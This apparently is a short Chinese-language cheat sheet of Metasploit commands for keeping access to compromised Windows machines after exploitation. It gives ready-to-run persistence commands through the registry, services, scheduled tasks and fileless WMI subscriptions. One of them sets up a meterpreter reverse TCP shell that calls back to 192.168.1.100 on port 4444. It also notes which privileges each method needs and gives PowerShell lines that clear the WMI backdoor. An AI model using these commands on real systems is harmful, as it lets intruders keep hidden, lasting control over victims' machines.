Metasploit 常用维权方式

metasploit 后渗透常用的维持权限的方式.

注册表

上传 vbs 开机自启 (被弃用).

1
run persistence -r 192.168.1.100 -p 4444 -i 5 -P windows/x64/meterpreter/reverse_tcp -X

上传 exe 开机自启 (替代 vbs 方式).

1
run post/windows/manage/persistence_exe REXEPATH=/home/exp10it/msf.exe

添加 powershell 开机自启.

1
use exploit/windows/local/registry_persistence

可指定 STARTUP, 但注意要在会话是 Administrator 权限的时候运行, System 权限需先降权, 否则无效.

服务

仅支持 x86 payload, 可通过 exploit/windows/local/payload_inject 反弹成 64 位的会话.

1
use exploit/windows/local/persistence_service

计划任务

上传 exe 执行, 需要 system 权限.

1
run scheduleme -e /home/exp10it/msf.exe -H 12

中途会出现 Failed to create scheduled task!!, 但实际上已经添加成功.

WMI

通过 powershell 方式执行, 无文件后门, 支持 5 种触发方式.

1
use exploit/windows/local/wmi_persistence

注意切换触发方式时要先清除以前的后门.

1
2
3
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='Updater'" | Remove-WmiObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='Updater'" | Remove-WmiObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%Updater%'" | Remove-WmiObject -Verbose
0%